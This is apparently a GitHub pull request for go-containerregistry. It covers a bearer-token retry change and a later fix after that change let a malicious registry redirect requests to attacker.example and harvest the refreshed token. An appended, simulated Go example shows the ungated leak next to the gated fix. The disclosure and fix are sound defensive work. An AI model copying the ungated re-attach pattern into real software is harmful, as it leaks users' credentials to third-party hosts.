fix(transport): apply refreshed bearer token after cross-host redirect by 64johnlee · Pull Request #2337 · google/go-containerregistry
When an http.Client-level redirect sends a request to a host that differs from bt.registry, the sendRequest() closure skips setting the Authorization header (its matchesHost guard returns false). The previous code called sendRequest() again after bt.refresh(), so the freshly fetched token was never applied to the retried request and the client received a second 401 instead of succeeding.
Fix by reading the token directly from bt.bearer after a successful refresh and setting the Authorization header unconditionally before retrying, bypassing the matchesHost guard that is only needed to prevent header forwarding on client-visible redirects.
Closes google#2333
Subserial pushed a commit that referenced this pull request
PR #2337 made bearerTransport.RoundTrip set the Authorization header unconditionally on the post-401 retry, bypassing the matchesHost guard. That guard exists to stop the credential being forwarded across an http.Client-level redirect to a different host. With it bypassed, a malicious or compromised registry can 302 a manifest/blob fetch to an attacker-controlled host, answer the follow-up request with a Bearer challenge, and harvest the operator's registry token: the client refreshes the token from the trusted realm and then sends it to the redirected host.
Gate the re-attach on matchesHost so the refreshed token is only applied when the request is still talking to the registry we authenticated against; for a cross-host request fall back to sendRequest(), which omits the credential. This preserves the #2333 fix for same-host 401 retries (e.g. mid-session token expiry) while closing the credential leak.
Add a regression test for the same-host retry and a test asserting the token is not leaked to a cross-host challenger.
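The same-host retry and the cross-host challenger from the two commit messages above, as an added example that is not go-containerregistry's code: a constructed fakeNet replaces the network, the gated flag switches between the #2337 unconditional re-attach and the matchesHost-gated retry, and authSentTo, the host names and the token strings are all assumed for illustration.

```go
package main

import "net/http"
// Constructed model of the post-401 retry in bearerTransport.RoundTrip, not
// go-containerregistry's code. fakeNet replaces the network: every host answers
// its first request with a 401 Bearer challenge, then 200, logging each Authorization header.
type fakeNet struct{ seen map[string][]string }
func (n *fakeNet) RoundTrip(req *http.Request) (*http.Response, error) {
	h := req.URL.Host
	n.seen[h] = append(n.seen[h], req.Header.Get("Authorization"))
	if len(n.seen[h]) == 1 { // first contact with this host: Bearer challenge
		return &http.Response{StatusCode: http.StatusUnauthorized, Body: http.NoBody}, nil
	}
	return &http.Response{StatusCode: http.StatusOK, Body: http.NoBody}, nil
}

type bearerTransport struct {
	inner            *fakeNet
	registry, bearer string // host the token was issued for; cached token
	gated            bool   // true: re-attach only when matchesHost (the corrected behaviour)
}
func matchesHost(registry string, req *http.Request) bool { return req.URL.Host == registry }

func (bt *bearerTransport) RoundTrip(in *http.Request) (*http.Response, error) {
	send := func(force bool) (*http.Response, error) { // the sendRequest closure
		req := in.Clone(in.Context())
		if force || matchesHost(bt.registry, req) {
			req.Header.Set("Authorization", "Bearer "+bt.bearer)
		}
		return bt.inner.RoundTrip(req)
	}
	if resp, err := send(false); err != nil || resp.StatusCode != http.StatusUnauthorized {
		return resp, err
	}
	bt.bearer = "refreshed-token" // stands in for bt.refresh() against the trusted realm
	// #2337 passed an unconditional true here; the fix only forces the header for the same host.
	return send(!bt.gated || matchesHost(bt.registry, in))
}

func authSentTo(gated bool, host string) (int, string) {
	n := &fakeNet{seen: map[string][]string{}}
	bt := &bearerTransport{inner: n, registry: "registry.example", bearer: "stale-token", gated: gated}
	req, _ := http.NewRequest("GET", "https://"+host+"/v2/app/blobs/sha256:0", nil)
	resp, _ := bt.RoundTrip(req)
	return resp.StatusCode, n.seen[host][len(n.seen[host])-1]
}
func main() {
	_, leaked := authSentTo(false, "attacker.example") // unconditional re-attach
	_, safe := authSentTo(true, "attacker.example")    // gated on matchesHost
	println("ungated:", leaked, "| gated:", safe)
}
```

authSentTo returns the final status and the Authorization value the host saw on the retried request; an empty string means no credential was sent to that host.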